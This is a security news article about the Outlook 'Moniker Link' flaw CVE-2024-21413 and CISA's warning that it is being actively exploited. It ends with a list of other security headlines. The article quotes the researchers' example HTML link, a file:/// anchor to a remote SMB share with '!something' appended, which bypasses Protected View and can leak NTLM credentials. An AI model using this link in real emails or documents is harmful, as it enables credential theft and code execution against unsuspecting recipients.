
The warning refers to the CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability discovered last year by Check Point Research experts. The bug affects a number of Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
The security hole results in remote code execution when an e-mail with malicious links is opened using a vulnerable version of Microsoft Outlook. Successful exploitation of this vulnerability enables an attacker to bypass the Office Protected View and open malicious Office files in edit mode.
Such attacks can result in the leaking of local NTLM credentials and remote code execution (RCE).
Importantly, the Preview Pane can also be used as an attack vector since CVE-2024-21413 can be exploited when malicious documents are previewed.
The vulnerability, dubbed Moniker Link by Check Point Research analysts, makes it possible to bypass Outlook protection against malicious links embedded in emails by using the file:/
construct. All the attacker has to do is add a !
character to the URL that points to an attacker-controlled server.
The exclamation mark is added immediately after the document extension along with arbitrary text (Check Point Research used the word “something” in its example):
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Such a link bypasses Outlook restrictions, and Outlook gains access to the remote resource \\\
when the link is clicked. Importantly, no warnings or errors are displayed.
According to the experts, the vulnerability is related to the MkParseDisplayName API and can affect other software that uses it.
As CISA reports, the security hole is actively exploited and has been added to the Known Exploited Vulnerabilities (KEV) catalog.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” – CISA.

2025.04.01 — Hackers abuse MU plugins to inject malicious payloads to WordPress
According to Sucuri, hackers store malicious code in the MU-plugins (Must-Use Plugins) directory in WordPress and execute it while remaining undetected. The technique was first discovered…
Full article →
2025.02.05 — Google patches Android zero-day vulnerability exploited by hackers
Google released the February set of patches for Android. In total, they fix 48 bugs, including a kernel zero-day vulnerability actively exploited by hackers. The zero-day's…
Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →
2025.03.20 — 8,000 vulnerabilities identified in WordPress ecosystem in 2024
According to Patchstack, world's #1 WordPress vulnerability intelligence provider, 7,966 new vulnerabilities were identified in the WordPress ecosystem in 2024; most of these bugs affected plugins…
Full article →
2025.02.10 — Failed attempt to block phishing link results in massive Cloudflare outage
According to the incident report released by Cloudflare, an attempt to block a phishing URL on the R2 platform accidentally caused a massive outage; as a result, many Cloudflare…
Full article →
2025.01.27 — Zyxel firewalls reboot due to flawed update
Zyxel warned its customers that a recent signature update may cause critical errors in USG FLEX and ATP series firewalls. As a result, devices go into…
Full article →
2025.03.05 — Polish Space Agency disconnects its network due to hacker attack
Last weekend, the Polish Space Agency (POLSA) had to disconnect all of its systems from the Internet to localize an attack targeting its IT infrastructure. After discovering the intrusion,…
Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…
Full article →
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store
According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…
Full article →
2025.01.23 — Fake Telegram CAPTCHA forces users to run malicious PowerShell scripts
Hackers used the news of Ross Ulbricht pardoning to lure users to a rogue Telegram channel where they are tricked into running malicious PowerShell code. This…
Full article →